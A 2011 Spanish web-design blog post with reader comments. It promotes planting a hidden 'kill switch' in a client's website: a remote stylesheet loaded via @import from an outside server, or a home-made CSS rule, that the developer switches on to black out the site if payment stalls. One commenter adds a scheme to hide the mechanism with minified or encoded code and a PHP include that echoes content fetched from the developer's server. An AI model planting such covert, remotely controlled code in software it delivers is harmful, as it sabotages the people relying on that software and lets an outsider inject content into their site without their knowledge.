No pagas, no hay web!

Escrito por en 31/03/2011

Cuantas veces te has encontrado en esa situación en la que le haces la web a un cliente, y este no hace más que retrasar el pago una y otra vez? O no solo retrasar el pago, sino simplemente no pagar.

Para aquellos momentos en los que ya hemos entregado el proyecto pero no lo hemos cobrado, y además el cliente ha cambiado usuarios y/o contraseñas del FTP para que no le borremos nada y él poder disfrutar de algo que no ha pagado, aquí os traemos una solución.

Se llama CSS Killswitch, y lo que nos hace es dejar la pagina del cliente moroso completamente negra, anulando así los estilos que hubiera previamente y dejando la web inservible, aun sin tener acceso al FTP.

Como funciona?
Killswitch te facilita una URL a una hoja de estilos remota, del estilo “http://cssksw.com/2novatos” que en principio no contiene nada. Esto lo ponemos en las cabeceras de la web que estamos haciendo, o si queremos ser más discretos, lo hacemos mediante una llamada en las CSS con esto:

@import url("http://cssksw.com/2novatos");

Una vez puesto esto, entregado el proyecto y en el caso de ver que la cosa no va por buen camino, es tan fácil como entrar al panel que nos facilita el servicio (por cierto, es gratuito) y activar el Killswitch, dejando la pantalla del “amigo” completamente negra.

Método casero.
Aun que si queremos hacerlo nosotros mismos, desde nuestro servidor si lo tenemos, por tenerlo más a mano… es tan facil como crear una hoja de estilos en blanco para cada proyecto, y añadirlo como hemos puesto anteriormente. Y en caso de que el cliente no pague, modificamos la hoja de estilos que esta en blanco poniendo lo siguiente:

body { background: black !important; }
body * { display: none !important; }

Aun que una buena solución, espero que no lo tengáis que usar.

Enlace: CSS Killswitch

Tags: /

7 Respuestas

  1. Y ahí voy yo de curioso a ser Rickrolleado.

  2. Tone says:

    Siempre puedes pedir un adelanto, a fin de cuentas los males no serían tan grandes de todas formas no está mal el método me lo guardo para un futuro lejando jeje

    Un saludo

  3. Oriol Navascuez says:

    Si, pero ponte en el caso…. pides el adelanto, que normalmente se pide un 40%, y el resto a la entrega del proyecto.

    Ahora bien, lo entregas y no ves el 60% restante. Es mucho dinero, y el trabajo que tu has realizado que? Y el tiempo que has empleado quien te lo paga?

    Pues es una forma de poner presión, siempre y cuando el cliente no sepa trastear las CSS y averiguar de donde viene la llamada al pantallazo negro.

  4. ¿Cómo le hiciste para que el enlace te lleve a el Rickroll?
    Por cierto, ya lo apliqué y si me resultó en pago :)

  5. WidPlay says:

    Bueno es algo bastante básico… cualquiera con muy pocos conocimientos veria el fallo… no obstante entre el js siempre puedes minificar o poner js sencillo pero poco sospechoso para que el dia x se active :P

    o que ese js o css se lo añada por algun include de un php enrevesado al body directamente haciendo un file_get_contents de un fichero en tu server que devuelve el css o js o nada, uno que no entienda exactamente que hace eso es bastante complicado que entienda esto:

    $noticias = file_get_contents(“http://miserver.com/webs/noticias_moroso.php”);
    if(length($noticias) > 0){
    echo $noticias;
    }

    Nadie tocaria eso jajaaj, si no entiende mucho que toca…, y si no incluso un encodeada la url o con algun parseado que divida la cadena… se puede recomplicar tanto como se desee.

  6. [...] que el cliente no pague, modificamos la hoja de estilos que esta en blanco poniendo lo siguiente: view source print? Codigo [...]

  7. Xavier says:

    Lo que yo hago es que jamas trabajo en servidores externos ¿quieres contratar el servicio conmigo? ok, 50% de anticipo por el diseño y contrato de 1 año por el alojamiento ¿que no paga el 50% del diseño? ok, finalmente la pagina la trabajo en modo “construcción” hasta que el cliente da el Ok, momento en el que se recibe el otro 50% y se da la capacitación.

    ¿Quieres una plantilla freelance para instalarla en tu servidor? se recibe un anticipo del 50% y la ven desde una pagina de pruebas en mi servidor, cuando dan el visto bueno se recibe el otro 50% y se envía la plantilla.

    Que no os engañen, si no podéis pagar un servidor dedicado contratar una cuenta de revendedor, pero no dejéis que os tomen por tontos.

Deja tu comentario